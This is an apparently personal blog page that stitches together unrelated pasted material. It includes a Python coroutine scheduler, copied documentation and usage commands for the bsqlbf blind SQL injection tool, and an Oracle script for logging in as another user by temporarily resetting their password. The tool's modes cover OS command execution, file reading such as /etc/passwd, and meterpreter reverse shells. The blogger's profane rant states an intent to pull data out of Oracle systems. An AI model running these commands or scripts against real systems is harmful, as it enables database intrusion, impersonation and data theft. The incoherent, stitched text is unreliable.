Wednesday, October 11, 2017

def run(root_coro):

    """Schedules a coroutine, running it to completion. This

    encapsulates the Bluelet scheduler, which the root coroutine can

    add to by spawning new coroutines.

    """

    # The "threads" dictionary keeps track of all the currently-

    # executing and suspended coroutines. It maps coroutines to their

    # currently "blocking" event. The event value may be SUSPENDED if

    # the coroutine is waiting on some other condition: namely, a

    # delegated coroutine or a joined coroutine. In this case, the

    # coroutine should *also* appear as a value in one of the below

    # dictionaries `delegators` or `joiners`.

    threads = {root_coro: ValueEvent(None)}

    # Maps child coroutines to delegating parents.

    delegators = {}

    # Maps child coroutines to joining (exit-waiting) parents.

    joiners = collections.defaultdict(list)

    def complete_thread(coro, return_value):

        """Remove a coroutine from the scheduling pool, awaking

        delegators and joiners as necessary and returning the specified

        value to any delegating parent.

        """

        del threads[coro]

        # Resume delegator.

        if coro in delegators:

            threads[delegators[coro]] = ValueEvent(return_value)

            del delegators[coro]

        # Resume joiners.

        if coro in joiners:

            for parent in joiners[coro]:

                threads[parent] = ValueEvent(None)

            del joiners[coro]

    def advance_thread(coro, value, is_exc=False):

        """After an event is fired, run a given coroutine associated with

        it in the threads dict until it yields again. If the coroutine

        exits, then the thread is removed from the pool. If the coroutine

        raises an exception, it is reraised in a ThreadException. If

        is_exc is True, then the value must be an exc_info tuple and the

        exception is thrown into the coroutine.

        """

        try:

            if is_exc:

                next_event = coro.throw(*value)

            else:

                next_event = coro.send(value)

        except StopIteration:

            # Thread is done.

            complete_thread(coro, None)

        except:

            # Thread raised some other exception.

            del threads[coro]

            raise ThreadException(coro, sys.exc_info())

        else:

            if isinstance(next_event, types.GeneratorType):

                # Automatically invoke sub-coroutines. (Shorthand for

                # explicit bluelet.call().)

                next_event = DelegationEvent(next_event)

            threads[coro] = next_event

    def kill_thread(coro):

        """Unschedule this thread and its (recursive) delegates.

        """

        # Collect all coroutines in the delegation stack.

        coros = [coro]

        while isinstance(threads[coro], Delegated):

            coro = threads[coro].child

            coros.append(coro)

        # Complete each coroutine from the top to the bottom of the

        # stack.

        for coro in reversed(coros):

            complete_thread(coro, None)

    # Continue advancing threads until root thread exits.

    exit_te = None

    while threads:

        try:

            # Look for events that can be run immediately. Continue

            # running immediate events until nothing is ready.

            while True:

                have_ready = False

                for coro, event in list(threads.items()):

                    if isinstance(event, SpawnEvent):

                        threads[event.spawned] = ValueEvent(None)  # Spawn.

                        advance_thread(coro, None)

                        have_ready = True

                    elif isinstance(event, ValueEvent):

                        advance_thread(coro, event.value)

                        have_ready = True

                    elif isinstance(event, ExceptionEvent):

                        advance_thread(coro, event.exc_info, True)

                        have_ready = True

                    elif isinstance(event, DelegationEvent):

                        threads[coro] = Delegated(event.spawned)  # Suspend.

                        threads[event.spawned] = ValueEvent(None)  # Spawn.

                        delegators[event.spawned] = coro

                        have_ready = True

                    elif isinstance(event, ReturnEvent):

                        # Thread is done.

                        complete_thread(coro, event.value)

                        have_ready = True

                    elif isinstance(event, JoinEvent):

                        threads[coro] = SUSPENDED  # Suspend.

                        joiners[event.child].append(coro)

                        have_ready = True

                    elif isinstance(event, KillEvent):

                        threads[coro] = ValueEvent(None)

                        kill_thread(event.child)

                        have_ready = True

                # Only start the select when nothing else is ready.

                if not have_ready:

                    break

            # Wait and fire.

            event2coro = dict((v, k) for k, v in threads.items())

            for event in _event_select(threads.values()):

                # Run the IO operation, but catch socket errors.

                try:

                    value = event.fire()

                except socket.error as exc:

                    if isinstance(exc.args, tuple) and \

                            exc.args[0] == errno.EPIPE:

                        # Broken pipe. Remote host disconnected.

                        pass

                    else:

                        traceback.print_exc()

                    # Abort the coroutine.

                    threads[event2coro[event]] = ReturnEvent(None)

                else:

                    advance_thread(event2coro[event], value)

        except ThreadException as te:

            # Exception raised from inside a thread.

            event = ExceptionEvent(te.exc_info)

            if te.coro in delegators:

                # The thread is a delegate. Raise exception in its

                # delegator.

                threads[delegators[te.coro]] = event

                del delegators[te.coro]

            else:

                # The thread is root-level. Raise in client code.

                exit_te = te

                break

        except:

            # For instance, KeyboardInterrupt during select(). Raise

            # into root thread and terminate others.

            threads = {root_coro: ExceptionEvent(sys.exc_info())}

    # If any threads still remain, kill them.

    for coro in threads:

        coro.close()

    # If we're exiting with an exception, raise it in the client.

    if exit_te:

        exit_te.reraise()

https://programtalk.com/python-examples/traceback.print_exc/?ipage=3

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).

This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections

Supported Database:

MS-SQL
MySQL
PostgreSQL
Oracle

The tool supports 8 attack modes(-type switch):-

Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in “order by” and “group by”.

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:

-stype: How you want to execute command:

SType 0 (default) is based on java..will NOT work against XE.

SType 1 is against oracle 9 with plsql_native_make_utility.

SType 2 is against oracle 10 with dbms_scheduler.

Download Now

https://breakthesecurity.cysecurity.org/2011/10/automated-blind-sql-injection-attacking-toolsbsqlbf-brute-forcer.html

CODE FOR SQL INJECTION WITH WHITEHAT DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC

https://code.google.com/archive/p/bsqlbf-v2/

bsqlbf-v2

Blind Sql Injection Brute Forcer version 2

This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:

0. MS-SQL

1. MySQL

2. PostgreSQL

3. Oracle

The tool supports 8 attack modes(-type switch):-

Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in "order by" and "group by".

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:

-stype: How you want to execute command:

SType 0 (default) is based on java..will NOT work against XE.

SType 1 is against oracle 9 with plsql_native_make_utility.

SType 2 is against oracle 10 with dbms_scheduler.

Usage example:

$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"

User Interface:

ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl // Blind SQL injection brute forcer \\ //originally written by...aramosf@514.es \\ // mofified by sid-at-notsosecure.com \\ // http://www.notsosecure.com \\ ---------------------usage:------------------------------------------- Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options) String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options) ------------------------------------options:-------------------------- -sql: valid SQL syntax to get; version(), database(), (select table_name from inforamtion_schema.tables limit 1 offset 0) -get: If MySQL user is root, supply word readable file name -blind: parameter to inject sql. Default is last value of url -match: *RECOMMENDED* string to match in valid query, Default is auto -start: if you know the beginning of the string, use it. -length: maximum length of value. Default is 32. -time: timer options: 0: dont wait. Default option. 1: wait 15 seconds 2: wait 5 minutes -type: Type of injection: 0: Type 0 (default) is blind injection based on True and False responses 1: Type 1 is blind injection based on True and Error responses 2: Type 2 is injection in order by and group by 3: Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit) 4: Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit) 5: Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java) -file: File to read (default C:\boot.ini) -stype: How you want to execute command: 0: SType 0 (default) is based on java..will NOT work against XE 1: SType 1 is against oracle 9 with plsql_native_make_utility 2: SType 2 is against oracle 10 with dbms_scheduler -database: Backend database: 0: MS-SQL (Default) 1: MYSQL 2: POSTGRES 3: ORACLE -rtime: wait random seconds, for example: "10-20". -method: http method to use; get or post. Default is GET. -cmd: command to execute(type 4 only). Default is "ping 127.0.0.1." -uagent: http UserAgent header to use. Default is bsqlbf 2.3 -ruagent: file with random http UserAgent header to use. -cookie: http cookie header to use -rproxy: use random http proxy from file list. -proxy: use proxy http. Syntax -proxy=http://proxy:port/ -proxy_user: proxy http user -proxy_pass: proxy http password ---------------------------- examples:------------------------------- bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1 bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"

Ok, boolean tribe..the hoores feel very much protected still by Oracle. So, let me be a bitch and not an intelectual! Let'me digg this 1st aspect " the actual username can be spoofed by use of BECOME USER. This leads to the fact that some spoofing can be done before the session" I want to transfer data from the piece of shit, not exacly on a MIM's. So I do get in, as BECOME USER?let me start beeing a bitch! over with brains olympic games NSA!

How to become another User in SQLPlus

See this link for a much better way to achieve this in current releases, using proxy users...
A DBA frequently needs to become another user to test something or verify a problem. Short of having to gain acess to that users password, we are asked can I su to that account, sort of like root does on unix.
This is an 'su.sql' script I use:

whenever sqlerror exitcolumn password new_value pw
declare
    l_passwd varchar2(45);
begin
    select password into l_passwd
      from sys.dba_users
     where username = upper('&1');
end;
/
select password
from sys.dba_users
where username = upper( '&1' )
/
alter user &1 identified by Hello;
connect &1/hello
alter user &1 identified by values '&pw';
show user
whenever sqlerror continue

it starts by testing your access to the sys.dba_users table -- if that fails -- it exits SQLPlus. If zero rows returned -- it exits SQLPlus.
It then selects the 'password' from the dba_users table and stuffs it into a macro variable "&pw"
We alter the user you want to become to have a known password (if that fails, we exit).
We 'fix' their password back after loggin in as them....
Note, you need to have access to dba_users and the alter user privelege.

All information and materials provided here are provided "as-is"; Oracle disclaims all express and implied warranties, including, the implied warranties of merchantability or fitness for a particular use. Oracle shall not be liable for any damages, including, direct, indirect, incidental, special or consequential damages for loss of profits, revenue, data or data use, incurred by you or any third party in connection with the use of this information or these materials.
https://asktom.oracle.com/Misc/su.html

BLACK MASK

Wednesday, October 11, 2017

forget it...I just remember to hunt them down, with a trick

traceback.print_exc

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

CODE FOR SQL INJECTION WITH WHITEHAT DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC

https://code.google.com/archive/p/bsqlbf-v2/

bsqlbf-v2

How to become another User in SQLPlus

Nickelback - Get 'Em Up

NATO NAVAL NAVY TACTICS

Total Pageviews

Search Webcams:
by www.online-camera.de